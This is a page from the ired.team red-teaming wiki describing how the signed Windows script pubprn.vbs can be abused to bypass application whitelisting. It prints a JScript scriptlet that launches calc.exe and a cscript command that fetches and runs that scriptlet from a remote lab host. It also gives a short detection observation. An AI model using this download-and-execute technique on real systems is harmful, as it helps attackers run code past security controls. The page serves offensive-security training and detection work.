Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
regsvr32
MSHTA
Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
CMSTP
InstallUtil
Using MSBuild to Execute Shellcode in C#
Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
pubprn.vbs Signed Script Code Execution
Binary Exploitation
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

pubprn.vbs Signed Script Code Execution

Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs

Execution

Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:

http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
<?XML version="1.0"?>
<scriptlet>
​
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
	>
</registration>
​
<script language="JScript">
<![CDATA[
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
]]>
</script>
​
</scriptlet>
[email protected]
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

Observations

Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:

Monitoring commandlines can be useful in detecting the script being abused:

References

Previous
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
Next
Binary Exploitation
Last updated 2 years ago
Contents
Execution
Observations
References